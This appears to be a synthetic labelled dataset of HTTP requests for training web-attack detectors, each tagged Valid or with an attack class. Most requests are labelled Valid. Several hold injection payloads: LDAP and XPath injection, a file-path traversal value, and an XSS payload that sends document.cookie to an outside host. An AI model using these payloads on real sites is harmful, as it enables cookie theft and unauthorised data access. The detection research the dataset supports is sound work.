If-Match: "fQxZwtHESSL2Rvj"
If-None-Match: "wty6uF2j6Krjxjqc@"
If-Range: Wed, 29 Sep 04 24:06:56 CET
Max-Forwards: 86
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: crSDqa Lrjm6ejj=na0tra
Authorization: X5isux aiftb=pLqw
Range: -63132
Referer: /ttoeDci/xomn.rar
TE: trailers,chunked;q=0.7
Trailer: Warning
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 2.2; ep-sS; rv:2.1.5) Gecko/26595218
UA-CPU: Sparc
UA-Disp: 3607,6288,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2347x796
Via: 7.8 158.177.66.209
Transfer-Encoding: compress
Upgrade: zlunrw/8.2, heha/4.6, trlti/2.2, eeo/1.5
Warning: 753 www.efttkwyh.shtml:579 "e6anePoa6iqyxLntoI" "Tue, 19 Jul 05 20:12:55 UTC"
X-Forwarded-For: 234.217.103.7
X-Serial-Number: 889921
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29754
Start - Id: 4458
class: Valid
POST /7SMSAj2YXIC2XZHo/rPh/re0UvlLBEOJOZEckxM_O/i8pCLLGjs@vSxWQV4/FVlqj2x2XjfP/unmti/bLhttp5HBA4/eCmbfw4rdanhaycw/Jpc5eraalltenexho/dhtjfciemiy/hrDTRT1Z-.mdb? HTTP/1.0
Content-Length: 268
Content-Language: naly2o
Content-Encoding: deflate
Content-Location: http://snN0eo.de/qstlinc/llxe/esuo/a5orypT/adeeip.cgi
Content-MD5: aWpvSXRhbjB4YnN3NmVvYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Oct 05 11:40:42 GMT
Last-Modified: Wed, 01 Dec 04 18:24:32 CET
Host: 49.43.179.115:3426
Connection: w0Tirbya
Accept: image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 130.13.90.42
Cookie: pasnh0o6nal=a7.9L;cydlw=99698424;tiasnnnemmOawm1=w;toe=e;natsert8isti=03
Cookie2: $Version="40"
Date: Sun, 24 Jun 07 20:03:19 UTC
ETag: W/"26t8-X4ga-aU@NCwa"
Expect: t7tdehi=moea;Lo5eT7=i2dirZa
From: wdWul@dxjn.gov
If-Modified-Since: Sat, 05 Apr 08 11:17:45 CET
If-Unmodified-Since: Sat, 18 Aug 07 14:34:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Jun 06 04:08:17 UTC
Max-Forwards: 2
MIME-Version: 8.6
Pragma: oyykhR='xhrbgCyo'
Proxy-Authorization: NTLM QWthNnVsbGVydGs2ZXBndHBlZTBnemJycm5hdFQ2YWV3cHRldFllczhzdG9hbg==
Authorization: Digest nonce
Range: 6054-,403221-,3-
Referer: http://www.tpihrtn.fr/apnbrnyl/vixd/e5bye5oH.avi
TE: gzip
Trailer: Expect
User-Agent: Mozilla/6.3 (compatible; Konqueror/4.3; Solaris; 5m0o; Aioa; imnea)
UA-CPU: StrongARM
UA-Disp: 9080,142,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 421x3151
Via: HTTP/3.1 www.bwfi8H.tiff, 8.9 19.83.207.154:1, s0i/4.9 3.109.65.2
Transfer-Encoding: gzip
Upgrade: iedsre/8.3, Tgua4/8.3
Warning: 835 133.223.176.11 "9IkBlRdeatilrei" "Sat, 18 Aug 07 07:10:31 UTC"
X-Forwarded-For: 11.144.91.166
X-Serial-Number: 053208446
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dTse6u=a7FjpBTr@nLC&2izqb9Br=pt0.&pluadkwhnoy1we=ay_E&ouaa=+xexech|e&ssaApnat7et=n&mEilrjfasRoacT=3&OXZ@@=7 doe&gees=73585&ee=oO&nCIrmscriptfq=rgtDiithPnhbl7&tmgxreulh5lecwR=rmaa g s&flvwneoRbsNj=a1G1dNcIasyB&mFrlSHS-7xterm=671363243&Qulsie=p1&lhrrxos84lihaT=796

End - Id: 4458
Start - Id: 13622
class: Valid
GET /tOn0/stglEd2i/lCeuWl/onlhntirldlnm/1G-L4b/PrBdeSWZhJetZbD/qcuatmfnQRginc/dqFL3u-b2YF01@zA/ludCEV7R6V/rpr/ialuddhmajnrciodk/nw3vyxhptesve.jpg?iBqi=6&hewe1aih=75&ahiGs=mcrp+cieJepassthru%27access_logvyboew&okxSVLmTGr=5864915&eey17ee=%28dieOil&ewBorwdDG=tXib&mnayoBaivSeztan=eruiwnmttisf&Yinclude7HA=85902386 HTTP/1.1
Host: www.82Dutm.gov
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, euc-tw;q=0.9, x-mac-turkish
Accept-Encoding: 
Accept-Language: tnmce-0ocAa;q=0.9, 5lene-orns, kbxe9-F, on-eeipo;q=0.4
Cache-Control: no-store
Client-ip: 63.99.161.90
Cookie: cdurSalnt=nh;ttei1=ea&e
Cookie2: $Version="604"
Date: Mon, 19 Jun 06 18:31:45 GMT
ETag: W/"AOW9jBnjTWv7dJ4"
Expect: 5Eds=8ltlnft8
From: ednsif0g@o99ssn.be
If-Modified-Since: Fri, 29 Jan 10 01:09:41 CET
If-Unmodified-Since: Mon, 12 Jan 04 10:51:19 UTC
If-Match: "R8RbRvBJbEL1xLdqlu"
If-None-Match: *
If-Range: "S-YRXpp@uYyHJH11F4"
Max-Forwards: 90
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: evYe vtutcenr=svCN1T
Authorization: Digest qop=utuyieA
Range: 91-
Referer: /3anae/bAdhahc/Albist/uAteoM8s/retdp.exe
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 3.8; ic-oU; rv:5.5.7) Gecko/16915910
UA-CPU: PowerPC
UA-Disp: 0811,7383,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: iSg/0.3 207.240.140.149, 0.6 114.56.93.177, FTP/9.6 www.tyttdli.jpeg
Transfer-Encoding: gzip
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 242 www.aseaogr.html "nerangaikenWialAe" 
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 7926590781102168
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13622
Start - Id: 18029
class: Valid
GET /tlaBetbblcn/l8poym4mim/ittca/iPstipweumhbro7/tJsGSk1aqSq9pQo./iptBEesieOrrEng/tin1aI8ntNtnumd3gta/aetndahnOzmewr0h/P65fxfwpg.jpg?ybSfEemlbnc=hnlayT&II6swp-lHroptNv0=passwdeid2aNconnectnh&oecobw=R%29leT&9hi=os+&ER-yB=032814357&nftuT5wui=rbF_xgR0&sUilytcop0agnls=9489661&mhy=30627957&9ennlinnsn=iupdateneoijtscriptrfw&rbcneeeEeAT=oneiuojfaligc&2Eglsgitieptm=02807 HTTP/1.1
Host: www.yedtluls.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.9, euc-cn, utf-7, windows-1253;q=0.3
Accept-Encoding: 
Accept-Language: s8d5be-ee0h;q=0.7, msnaa-hAp, roD2zmq-aPrmtC3o
Cache-Control: max-stale=467
Client-ip: 77.4.209.30
Cookie: eosl=tytild7meeT;eh=aoqbetweenRshpfYectr
Cookie2: $Version="696"
Date: Mon, 23 Jan 06 18:04:41 UTC
ETag: "Y5XVc5vLTuEmHw7jl"
Expect: 100-continue
From: ats2Yl@qfecrc.org
If-Modified-Since: Wed, 04 Oct 06 22:51:21 CET
If-Unmodified-Since: Wed, 12 May 04 21:50:02 CET
If-Match: "_Wf1z5_ce7b2bn5VU"
If-None-Match: *
If-Range: Mon, 26 Jan 09 09:47:10 GMT
Max-Forwards: 38
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic NnNlZ2R0OmlleXRn
Authorization: Digest nc=c5aCCeaE
Range: 223-,754-
Referer: /bkAmeh/Nebft2hl/3nErarjd/lLpsr/o2cehiaf.php4
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: li1cur/5.2.9
UA-CPU: PowerPC
UA-Disp: 8850,7638,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9181x5761
Via: 6.8 www.Hoaig.css:3, 9.0 237.166.238.138
Transfer-Encoding: deflate
Upgrade: mnit2e/4.0, 20vtg/4.8, nef3hy/1.1
Warning: 588 163.8.214.21 "m46Ire" 
X-Forwarded-For: 104.233.139.60
X-Serial-Number: 9297794233
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18029
Start - Id: 38551
class: LdapInjection
GET /opFLh17H21vaacw9KNWR/rspFYMt1uV.shtml?aonIessa=4&-MFstdin=%29+++%28+++%7C%28displayName%3Dhad*%29++++%28name%3D+++had*+%29%28++++mail%3Dhad*+++%29&td0sek=38016&tfae7teahfyage=990&eldfeeoEehAtNYT=530&Sedrrpee5ionH39=sexeBiosodeletel&xoFeo=snbcD3ni4rpE6ur0a HTTP/1.0
Host: 188.73.7.83
Connection: n8drE
Accept: */*;q=0.6
Accept-Charset: ks_c_5601-1987, cp-932;q=0.6, iso-2022-kr, iso-8859-15;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=092
Client-ip: 79.72.69.82
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="4"
Date: Sun, 30 Apr 06 03:30:44 UTC
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: 100-continue
From: zttnih@4elXnnltkb.org
If-Modified-Since: Wed, 28 Feb 07 13:13:47 UTC
If-Unmodified-Since: Mon, 12 Apr 04 18:58:46 GMT
If-Match: "6997.bBrvC@pu8C@"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 5
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest nc=3f33937E
Range: 0-592893,7-227,398-
Referer: /eohe/i4riOm/erePan/lguc2kO/i4agv0.exe
TE: gzip
Trailer: Transfer-Encoding
User-Agent: n5eeadeoctihNef0ecEr
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: FTP/7.8 www.tthua.shtml, FTP/6.1 www.reaEhec.jpeg
Transfer-Encoding: identity
Upgrade: bNdid/9.4, uoM1/7.6
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38551
Start - Id: 18172
class: Valid
GET /HTI/xfdpaZnDcKQj4C/usthvitvqjemdetu.htm?das2e9=iwv&varlcVVconnect=88&ncsndcntaa0Aeh=tieottrnaccess_logtpiDsp&HA_qYQpX6O=hLRmwe&adosr=eGoG&liMn=77&aaop61l=7AchFhe5Qtn7&3ldci=75338310 HTTP/1.0
Host: www.8oetzpl.net
Connection: pmen6rer
Accept: video/quicktime, text/*;q=0.6, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate;q=0.6, identity;q=0.3, compress;q=0.2, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-age=13197
Client-ip: 235.3.254.254
Cookie: dRBnd0H=0974466;lpDimnnlEEhe=itp
Cookie2: $Version="508"
Date: Sun, 06 Aug 06 13:06:52 GMT
ETag: "3a9RjfqPy5gV5tX7"
Expect: 100-continue
From: rsbc@wrnhyse.biz
If-Modified-Since: Mon, 16 Apr 07 07:59:30 UTC
If-Unmodified-Since: Wed, 14 May 08 08:40:51 UTC
If-Match: "g.hOfGIIWeYu4rknWb"
If-None-Match: "UJ@6r_v-sNhY1EV"
If-Range: Mon, 22 Dec 08 17:53:50 GMT
Max-Forwards: 98
MIME-Version: 1.0
Pragma: eoi='tnwet'
Proxy-Authorization: NTLM bzJuTGVlaVducmxpbXNhc21OdGU1bEZsaWF0dGVlam9ydw==
Authorization: naLg Afdecvbr=tiaol0d
Range: 6439-,6-42914,-964
Referer: /re6phi.dll
TE: gzip;q=0.4,trailers
Trailer: Pragma
User-Agent: ewQ44e http://www.riqtbj7.cz
UA-CPU: MIPS
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3922x0648
Via: 8RitI/6.5 57.170.54.163, 3.9 www.Nirhe.html
Transfer-Encoding: neehae; no0nen=ATiwlds
Upgrade: receba/6.4, n0ete/3.0, 8dtoRs/5.6, voa/4.8
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 53.225.75.3
X-Serial-Number: 45102302554958015
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18172
Start - Id: 44858
class: PathTransversal
GET /iER4zyZC-Qnf8sAI1/3N82/fOwPo/y0nG6AbMdZsGNHa4-3T1/oTb/stpueneeidmioe/8miarotenhpfm6as.html?cnttaeopmtWspii=oisro8hyte&49XqE7adDl=5625965&eE=6cEt8l5ildnis&8lX_I9IZBV=hnnaea%29noderZc&kshiiolh46he=file%3A%2F%2F%2FT%3A%2Fwni2d%2Fbta%2F5dMaygeo.xml&ivmih1t3tosz=8-%28ewget%3Flee&iwl8eqn=1060322&VYY5EG1=fat5 HTTP/1.0
Host: 73.211.105.18:37327
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: utf-8, x-mac-ce
Accept-Encoding: identity;q=0.3, deflate, gzip;q=0.3
Accept-Language: hgUeea-moi, 38r-eu;q=0.4, yny7ce-vdes, UeShi5t2-2essrtg;q=0.6, re9if-Besssf
Cache-Control: only-if-cached
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Mon, 22 Mar 04 07:41:02 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Fri, 27 Feb 09 02:41:16 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: "Gp7y_H44dVZHIAb"
Max-Forwards: 03
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: Basic czRzaWVyOmFUckNzdXJu
Range: 3752-,303-8,-33345
Referer: http://ne7beh.fr/gheyi.cgi
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: qbbiuh (aP4yrY3d; ew6x1Wm5v)
UA-CPU: StrongARM
UA-Disp: 7085,0272,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: 8.2 224.145.89.72, 4.4 www.hlijaAhh.htm, 5.1 247.212.47.152
Transfer-Encoding: compress
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 24997
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44858
Start - Id: 25764
class: Valid
GET /zD6U@qJCs/via9ctrengVe/ePldl3imJOjAF-L/ca/evyNq2/yuYWU_dk/taynewo/erttZ9eoRadhiveedaen.shtml?enwenttBcvi=hmgeiNoee++6stdin%5Bae&RTwtZch43TsAVhr=dxtermeexp_&xS7M.stdin0m=8388220&snafausd=Idseiebw6CuR HTTP/1.0
Host: 65.247.148.145:240
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nymut-saameha5, b0eb-o;q=0.3, pdlbdf-qeoa, x7o-leaint
Cache-Control: max-age=53
Client-ip: 101.238.69.90
Cookie: otstaeatv9xO5=obe;eu3ya=rnph-tazm qdihlAs;nanrazreocttros=008864;69=422
Cookie2: $Version="44"
Date: Fri, 19 Oct 07 15:32:35 CET
ETag: W/"Tn3GOjM58@xlTf@7.kl7"
Expect: 100-continue
From: wsit@mwmse.com
If-Modified-Since: Thu, 30 Aug 07 23:06:12 CET
If-Unmodified-Since: Wed, 04 Jun 08 22:24:10 GMT
If-Match: *
If-None-Match: "lUSPS3LP75pmmU7"
If-Range: *
Max-Forwards: 7
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZlRtYTllaWU6ZTdzcnBvdXQ=
Authorization: Digest qop=auth
Range: 0846-,55-
Referer: http://tcsu.com/9midsri/doAsi/1sAn.jsp
TE: trailers
Trailer: If-Range
User-Agent: h.X.5YFERa http://www.adael.ch
UA-CPU: Sparc
UA-Disp: 4510,2608,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0106x257
Via: 3.3 77.224.24.35, 2.4 www.8hhoretp.gif:286
Transfer-Encoding: deflate
Upgrade: ReaTr/9.3
Warning: 928 4.71.150.181 "eif2TenhunoLoU" 
X-Forwarded-For: 249.109.166.6
X-Serial-Number: 63082151043081
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25764
Start - Id: 22040
class: Valid
GET /orljtekr/EGDW8tw.png?nm=m%40bveSB&ogo5tSiNrtzier=ytmpr&v-Nn5C5Yqurw=4781&eirhmimli9osemi=hsavausddu+&reetihipakefe=inregc&6bgowhrao=d0J1f7.&yie=rJlTaYs39S&smsee=4253&3j7=2&eNi3eixdegbcoo=252 HTTP/1.0
Host: 85.229.49.158:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, deflate, deflate, deflate;q=0.5
Accept-Language: yrpmi-jnrs, udeea-EaoiA;q=0.4, imr-adbes8, Ceufhnen-tidr1mi;q=0.6
Cache-Control: no-cache
Client-ip: 254.122.123.9
Cookie: ps=oooa$;eilp= s ls;edrjNxafo=5tssoGk;itRjvetnne3=6420074;dnnat2=yGkk;ae=j
Cookie2: $Version="2"
Date: Wed, 09 Aug 06 20:09:04 GMT
ETag: "MA0UIK2Tz9EwMxX26ZUU"
Expect: 100-continue
From: rnoHSnss@agsartc.de
If-Modified-Since: Tue, 23 Aug 05 15:44:40 UTC
If-Unmodified-Since: Sun, 26 Aug 07 24:09:59 CET
If-Match: "2GQL-NpEy06xCX-ZE-@H"
If-None-Match: "cuERd4IEVKzaiEP"
If-Range: Thu, 05 Oct 06 02:52:26 CET
Max-Forwards: 7862
MIME-Version: 3.2
Pragma: t6ww='e'
Proxy-Authorization: NTLM NmdkZURlYmZoZW90emdNdHpkcmVmN3NoaWhzeWlvdHJ0
Authorization: Digest username="eHnsat"
Range: 5-448267
Referer: /Xanoltf/gqoFrd.gif
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: echoou
UA-CPU: x86
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4794x4062
Via: FTP/7.3 www.to8a.js, 6oeeqt/9.3 169.40.88.8, 6.0 156.92.180.239
Transfer-Encoding: compress
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 103 www.Krm9fhll.htm "rrsU3rWt9etr" 
X-Forwarded-For: 215.72.82.69
X-Serial-Number: 10148622161169
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22040
Start - Id: 49804
class: XPathInjection
GET /erqzRWH7b/telyDcot/wVGfCdntmhIxh.php4?7LBgOzqTchildmail2=809+or++++mrdodn%2Fr6pe%2Ftntk%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D32%5D+or++++827%3D&trtheso5piennI=07&D_xtjj3mAL=eY6uYJUWw&FQWbTIrqpsjlog=elOnbgtelnetntnndcki HTTP/1.1
Host: www.toarcx.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Sun, 17 Feb 08 04:44:14 CET
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: ee6oai1@Beatdr.com
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Tue, 24 Mar 09 15:19:08 CET
If-Match: "ETH2EVmwzJB-sR6imQ2B"
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: "1r5@Ia9K@9zAF79wC.o"
Max-Forwards: 319
MIME-Version: 8.4
Pragma: semyhzhs='smdtl'
Proxy-Authorization: Digest nonce
Authorization: creww rhlhoo=anoa
Range: 1-,586-,-3399
Referer: /3Njl.jsp
TE: chunked,deflate;q=0.3
Trailer: Accept-Encoding
User-Agent: hddeteyz (skjeaLu; yjX5j.IqP3; sA5O-q@v)
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: coiw/4.4 117.47.202.149, 4.4 32.48.92.239, 2.4 226.113.93.253:8
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 134.221.245.253
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49804
Start - Id: 18740
class: Valid
GET /bb0H3B3tsRyw60jkb/sxW0/cdtNqPHUpU/iAyo21D2A/uKqrx0P1KTwCC/fQJnsitxj6C@cac.a2/lp/reHtrmPe/9swrhilszcr/oylenrttlnAtoptsi1n/gRBlG7.Asor5IAm-/eeethsdyhhrnejlYodpe.htm? HTTP/1.0
Host: www.odnrtdhdo.net
Connection: bs3el
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: he5=a
Client-ip: 219.245.151.93
Cookie: uiubeoosTtissxs=9r(;kiiilcl7=aprocessing-instruction;tzjaoitetE=229001147
Cookie2: $Version="357"
Date: Fri, 06 Feb 09 09:25:40 GMT
ETag: "CXvAWFbVtSA2Kq_"
Expect: 100-continue
From: envreer4@lEts7.gov
If-Modified-Since: Mon, 21 May 07 07:43:40 CET
If-Unmodified-Since: Mon, 02 Feb 09 23:16:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3556
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bW5udHphbTpSUmFqaQ==
Authorization: NTLM OGY0dHNhSWVuaWNoaXd0c2F0YWRpdGhob3JvQWtzbXFUQXR6aTly
Range: 43867-
Referer: http://iro8i.gov/tsoqeSa/igldE/nht5Hsaa/ej4mxrti.wav
TE: deflate;q=0.1
Trailer: Accept
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 9.7; os-bm; rv:8.4.2) Gecko/46380524
UA-CPU: 68000
UA-Disp: 752,4892,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 854x2880
Via: 2.7 www.ynnravib.png
Transfer-Encoding: identity
Upgrade: tsph/1.2, tuaja/3.0, znkshr/1.9, anfUk5/0.8, nvas/2.0
Warning: 896 162.167.110.244 "onwSdntiHtdsblbb1u" "Mon, 11 Jun 07 23:51:20 UTC"
X-Forwarded-For: 38.79.221.170
X-Serial-Number: 64403
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18740
Start - Id: 26532
class: Valid
GET /eLT7.js?awn=edta%3Eiozmiogo+&wnreasgd=CRt3dssb0gChnjd&nnash=byRFpl5qIh&pe=%7E+dR&0DKAautoexecZQF=uitwl1eafleVtlehsl&Nnnolummaebmsdf=958962&wIneleaiio9nu1=sEaeacceptsqtosc+o&lowio=q9t&aM48rNkipsgaeb=84492430&fneern3er=9cerZeeNetea&pn6Ollike-7UHq2=189372&nrialyctfcheo3i=t%24ouusg&anuisrlitt8n=iEzsyuea4l5lnleuoh&ualZ=31 HTTP/1.0
Host: www.otAsiab.st:80
Connection: close
Accept: text/plain, text/*;q=0.1
Accept-Charset: us-ascii, us-ascii;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 134.90.132.179
Cookie: r6hposzatEca=786134997
Cookie2: $Version="952"
Date: Wed, 14 Mar 07 07:49:20 UTC
ETag: W/"jSC75tGlEgZvB_Lgo"
Expect: 100-continue
From: 2oida@icenhE.de
If-Modified-Since: Sun, 30 Nov 08 20:37:59 UTC
If-Unmodified-Since: Wed, 30 Jun 04 08:06:09 GMT
If-Match: *
If-None-Match: "0QAjtdqca6CHlUykV"
If-Range: Sun, 13 Jul 08 18:57:58 UTC
Max-Forwards: 0522
MIME-Version: 2.6
Pragma: netituAa='vethyEis'
Proxy-Authorization: CrcHl 7otge=ez2Tr
Authorization: NTLM cnRlbGk4YXJkaHNnTW5jRmE3c29vd3Q4dG44YWRlblRlZ1VvbzdvZWhlZzk4ZQ==
Range: -51243,13953-
Referer: /8mbo.tar.gz
TE: gzip;q=0.9,deflate
Trailer: Range
User-Agent: Mozilla/9.5 (compatible; MSIE 9.1; Mac OS X; ohytliT)
UA-CPU: MIPS
UA-Disp: 7109,7775,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 987x6257
Via: HTTP/3.7 36.219.85.161, 0.6 www.eOltoe.htm, HTTP/5.9 www.yalwn.shtml
Transfer-Encoding: aai7
Upgrade: t7nkm/4.3, ho2Bts/8.8, n0ao/6.2, teo/7.9
Warning: 846 www.8izeOwa.css "ycneewrAaeCe" "Sun, 10 Oct 04 21:50:35 CET"
X-Forwarded-For: 240.213.194.27
X-Serial-Number: 693373977262
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26532
Start - Id: 29026
class: Valid
GET /S9KL.bin?KfMfJZ=gkanmgByi3fohqbdw&sa=%5D%3Ap%5C&@styleOLcXQAQjiH=9189&W4M3=dht&E6K4telnetd8HsM=u%3Desr8ehar3psq&oeoeRiEa9jhmh=ijQsJVZ&0e3tueenoujMDs=565&ro=22617&rldTeqq9e=prabr&V8rmxP5gL=4idtti&auqcL1z0ne=cm1wi&7itvtnnchaoi=640467&Eow=oo HTTP/1.1
Host: www.1dossdile.ch:10451
Connection: keep-alive
Accept: text/html;q=0.8
Accept-Charset: x-mac-icelandic, ks_c_5601-1987, iso-8859-15, windows-1252
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 213.215.107.144
Cookie: sgecoanD=w;irrlihiCitF=48spT0DN7;t6eP=b:system'h
Cookie2: $Version="6"
Date: Fri, 14 May 04 21:07:16 GMT
ETag: W/"E1PsNYHqAeuMenzMDzx"
Expect: 100-continue
From: te6nde@Ieee0ntr7.net
If-Modified-Since: Sat, 24 Mar 07 01:52:20 CET
If-Unmodified-Since: Tue, 13 Feb 07 21:22:01 GMT
If-Match: *
If-None-Match: "jKEPDUL5wYHfszpubFSV"
If-Range: Wed, 26 Nov 08 04:45:22 GMT
Max-Forwards: 2443
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM aW9ublVyaGllb0pybHB6ZWFtcW5zcHJZTmFoYWR0bmo2aGduMXNoaW9x
Authorization: tpes7 nmEaSbr=sIn8btel
Range: 3-,5985-7558,753-
Referer: http://gar9.uk/740neto/oeAsa/t2il.pl
TE: deflate;q=0.4
Trailer: Connection
User-Agent: ixi2tCrmpg/3.7.0.6
UA-CPU: x86
UA-Disp: 6183,441,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: FTP/2.1 www.orb8Mr.css:682
Transfer-Encoding: deflate
Upgrade: hoyban/5.3, e7nm/6.7, idsix/6.8, nehEgh/3.6
Warning: 992 www.ntgo3cv.htm "seCcmng" "Wed, 13 Apr 05 13:20:02 CET"
X-Forwarded-For: 157.73.34.25
X-Serial-Number: 055751373307057
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29026
Start - Id: 47553
class: XSS
GET /oGfbrqIuzB/tTeizl-9KsCYz/ZlinkjFtEreplaceOb/oHVjbAvNyCjow9/dV8pXxmlar/rjY/Ce/eexowatlgOpdrni1.swf?vuko=94&2cEeERe7atOh1B=seLVkeincoaprocessing-instruction&IlZ5boot.iniZ=we+ryee&euaudedOb=rdd+c4&zThcj=toiP_i&0httpsidNselectM=%3Cdiv+onmouseover++++%3D+++%22+%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ient.com%2Fcgi-bin%2Fnena.cgi%27%2Bdocument.cookie%29%3B%5D+++%22%3E&oaNw=%40+9f%40&znwt=u2eou&rotlealxl=96&dS0c=aS HTTP/1.1
Host: www.ehtda6qee.org:80
Connection: dLoduu
Accept: audio/basic;q=0.0
Accept-Charset: x-mac-turkish, x-mac-hebrew;q=0.6, iso-8859-15;q=0.6, euc-tw;q=0.5, iso-8859-9;q=0.4
Accept-Encoding: identity, compress;q=0.3, deflate;q=0.8, gzip;q=0.3, gzip
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 120.244.182.14
Cookie: ntatmsh=76;gsseits=d n<qtr;ahsrueUj5=iuAg
Cookie2: $Version="8"
Date: Mon, 15 Dec 08 07:11:20 UTC
ETag: "5Prg8S_P@.fZQyoZ"
Expect: aZpnthrk
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Sat, 29 Oct 05 16:16:14 CET
If-Unmodified-Since: Mon, 04 Feb 08 07:48:06 CET
If-Match: "eoyKEnb8nGT-xB-qzP"
If-None-Match: "qTkrEdgRX.XPC@P"
